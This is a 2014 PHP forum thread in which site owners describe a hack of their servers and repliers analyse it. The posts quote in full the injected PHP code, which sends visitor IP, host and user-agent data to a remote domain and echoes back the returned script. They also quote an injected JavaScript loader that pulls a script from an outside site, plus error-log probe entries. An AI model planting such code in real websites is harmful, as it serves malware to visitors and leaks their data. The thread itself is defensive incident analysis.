PHP Developers Network

A community of PHP developers offering assistance, advice, discussion, and friendship.
 
Loading
It is currently Sun Mar 26, 2017 6:12 am

All times are UTC - 5 hours




Post new topic Reply to topic  [ 11 posts ] 
Author Message
 Post subject: Wierd files on server
PostPosted: Thu Jan 09, 2014 5:33 pm 
Offline
Forum Contributor

Joined: Sat Sep 28, 2002 7:05 am
Posts: 243
Hi,
I discovered that on Dec 25th and on Jan 4th some files where changed on a server account, I found the following code added to the file that is used to login to an admin side of an admin account:

Syntax: [ Download ] [ Hide ]
<?php
#4f9ad5#
error_reporting(0); ini_set('display_errors',0); $wp_li1101 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_li1101) && !preg_match ('/bot/i', $wp_li1101))){
$wp_li091101="http://"."error"."css".".com/css"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_li1101);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_li091101);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_1101li = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_1101li,1,3) === 'scr' ){ echo $wp_1101li; }
#/4f9ad5#
?>
<?php

?>
<?php

?>
<?php

?>
<?php

?>
<?php

?>
<?php

?>
<?php

?>
<?php

?>


This code was also in a php file placed in a directory called 'template', this was not placed there by myself and the directory has the same creation date as one of the dates where the other files where found to have been altered. The directory where the 'template' directory was located has not got write permissions.

I also seen that several jquery files where altered, they seemed to have all the '+' operators removed, this would just break the code, just didn't seem to make any logical sense.

This account has no other access apart from myself so it's not as if someone else could have done this without gaining access to the account, password has been changed but does anyone have any idea as to what might have been going on?

p.s. Needless to say the files have been replaced, removed and the password changed on the server.


Top
 Profile  
 
PostPosted: Thu Jan 09, 2014 6:36 pm 
Offline
Spammer :|
User avatar

Joined: Wed Oct 15, 2008 2:35 am
Posts: 6379
Location: WA, USA
There was an exploit somewhere, but I think that goes without saying.

If you want to track down where, take a look at your server error logs (like auth logs) and your web server access logs (like to look for abnormal requests). If you're on a shared server then it's a bit harder and it could be that someone else on the server did it, but if you are then you should get your hosting provider to help you track down the problem - it's a problem for them too.

By the way, write permissions on a directory only matter when making changes to what is in the directory, such as creating new files. Files can be edited regardless (as long as you have write permissions on the file).


Top
 Profile  
 
PostPosted: Fri Jan 10, 2014 2:20 pm 
Offline
Forum Contributor

Joined: Sat Sep 28, 2002 7:05 am
Posts: 243
Thanks for the reply.

I looked at the error log and found the following:

Syntax: [ Download ] [ Hide ]
[Thu Jan 09 15:36:21 2014] [error] [client 188.143.234.6] File does not exist: /home/user/public_html/++++++++++++++++++++++++++++++++++++++Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Erafkayatte";+\xe2\xee\xe7\xec\xee\xe6\xed\xee,+\xee\xf2\xef\xf0\xe0\xe2\xeb\xe5\xed\xee;, referer: http://domain.com/+++++++++++++++++++++ ... %E5%ED%EE;
[Thu Jan 09 11:25:22 2014] [error] [client 194.154.83.18] File does not exist: /home/user/public_html/user, referer: domain.com
[Thu Jan 09 03:20:56 2014] [error] [client 103.31.200.92] File does not exist: /home/user/public_html/js/+d.href+, referer: http://www.domain.com/js/+d.href+
[Thu Jan 09 03:20:56 2014] [error] [client 103.31.200.92] File does not exist: /home/user/public_html/js/+(, referer: http://www.domain.com/js/+%28/%5ehttps/ ... href%7c%7c


I am puzeled and curious, does anyone know what is actually trying to be done here? I can't see much in hacked files where PHP was added except what looks like a URL transfer.
Anyone any idea?


Top
 Profile  
 
PostPosted: Fri Jan 10, 2014 2:26 pm 
Offline
Moderator
User avatar

Joined: Tue Nov 09, 2010 3:39 pm
Posts: 6192
Location: Montreal, Canada
Looks like the error log is giving you a list of 404s from exploits he tried. I'd take a look at the access logs for the same time period as he eventually found one that worked.

_________________
Supported PHP versions No longer supported versions


Top
 Profile  
 
PostPosted: Fri Jan 10, 2014 6:08 pm 
Offline
DevNet Resident

Joined: Sun Jun 14, 2009 3:13 pm
Posts: 1146
Looks like the logs are modified so it is hard to tell what the hacker is trying to access, but it looks like they are trying to find a script that can be encouraged to execute external code, or write to the local file system.

Are you running some commonly used tools or frameworks like wordpress or jquery or other javascript/php or template packages? Since I can't tell what files he is trying to exploit from your logs I would guess you have something installed that has a hole in it and needs patched.

Quote:
I can't see much in hacked files where PHP was added except what looks like a URL transfer.
It is possible the hacker is having trouble injecting code into your files, but is able to do some modifications. What do you mean by "URL transfer"?

I will say that http://errorcss.com is in Beijing, China and this script is setup to ping it with host, ip and user agent information if a browser is not a "bot" and is Gecko or MSIE. If whatever data you send them meets some criteria they will then set if (substr($wp_1101li,1,3) === 'scr' ) so the user sees the response from errorcss.com. It is possible they are using your server to spread malware to vulnerable browsers.


Top
 Profile  
 
PostPosted: Sat Jan 11, 2014 4:54 am 
Offline
Forum Contributor

Joined: Sat Sep 28, 2002 7:05 am
Posts: 243
Eric! wrote:
Looks like the logs are modified so it is hard to tell what the hacker is trying to access, but it looks like they are trying to find a script that can be encouraged to execute external code, or write to the local file system.

Are you running some commonly used tools or frameworks like wordpress or jquery or other javascript/php or template packages? Since I can't tell what files he is trying to exploit from your logs I would guess you have something installed that has a hole in it and needs patched.

Quote:
I can't see much in hacked files where PHP was added except what looks like a URL transfer.
It is possible the hacker is having trouble injecting code into your files, but is able to do some modifications. What do you mean by "URL transfer"?

I will say that http://errorcss.com is in Beijing, China and this script is setup to ping it with host, ip and user agent information if a browser is not a "bot" and is Gecko or MSIE. If whatever data you send them meets some criteria they will then set if (substr($wp_1101li,1,3) === 'scr' ) so the user sees the response from errorcss.com. It is possible they are using your server to spread malware to vulnerable browsers.


Thanks for the reply.

The only thing I modified from the logs for posting is the domain and the user.

I am using jquery on the server for a lightbox and wow, these files are the ones that the '+' operator was removed from.

I mentioned URL transfer only because the curl_setopt() function was in the php code placed in the file.

Thanks again.


Top
 Profile  
 
PostPosted: Sun Jan 12, 2014 11:19 am 
Offline
Forum Contributor

Joined: Sat Sep 28, 2002 7:05 am
Posts: 243
BTW, on looking at the logs I see an error in the last couple of days where the person was looking for js files on the server. I changed directory names after I found the problem so it seems someone was looking for the old js directory.

[text][Fri Jan 10 20:29:10 2014] [error] [client 180.76.6.16] File does not exist: /home/user/public_html/js

Thanks again for everyone who replied on this post.


Top
 Profile  
 
PostPosted: Mon Jan 13, 2014 4:50 pm 
Offline
DevNet Resident

Joined: Sun Jun 14, 2009 3:13 pm
Posts: 1146
If you haven't upgraded all those libraries, you probably should as well as go through the release notes to see if you can find a security fix that matches the version and problem you witnessed. If you have the most recent libraries/files, then there might be a security flaw and it's just a matter of time before they re-index your domain and find the file again. In fact since you moved it and saw an error they might have already re-indexed your files.


Top
 Profile  
 
PostPosted: Tue Jan 14, 2014 10:27 pm 
Offline
Moderator
User avatar

Joined: Mon Nov 03, 2003 7:13 pm
Posts: 5975
Location: Odessa, Ukraine
requinix wrote:
There was an exploit somewhere, but I think that goes without saying.

There's one more place which might get exploited requinix forgot to mention: the computer you use to access the server. Malware is known to gather FTP passwords, and I'd imagine it's not that hard to intercept web-based access credentials either, once your computer is infected.


Top
 Profile  
 
PostPosted: Thu Jan 16, 2014 6:46 pm 
Offline
Forum Newbie

Joined: Thu Jan 16, 2014 6:40 pm
Posts: 1
I also had the same attack
The January 5 they injected this code in some .php file (index, header, footer,etc)

<?php
#a3e35a#
error_reporting(0); ini_set('display_errors',0); $wp_vqcs1 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_vqcs1) && !preg_match ('/bot/i', $wp_vqcs1))){
$wp_vqcs091="http://"."html"."-style".".com/style"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_vqcs1);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_vqcs091);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_1vqcs = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_1vqcs,1,3) === 'scr' ){ echo $wp_1vqcs; }
#/a3e35a#
?>

On January 15 they injected this code in all .js file of my server

/*38c393*/
document.write("<script src='http://www.ceprede.es/y2W8Ljrc.php?id=122690528' type='text/javascript'></" + "script>");
/*/38c393*/

the problem is that I have many sites on a single shared server, so I can not go back to where it started the attack

i think on some wp installation, but i don't know exactly

:(


Top
 Profile  
 
PostPosted: Thu Jan 16, 2014 7:41 pm 
Offline
Spammer :|
User avatar

Joined: Wed Oct 15, 2008 2:35 am
Posts: 6379
Location: WA, USA
apelissetti wrote:
i think on some wp installation

Yeah, WordPress is know for that... feature.


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 11 posts ] 

All times are UTC - 5 hours


Who is online

Users browsing this forum: No registered users and 3 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group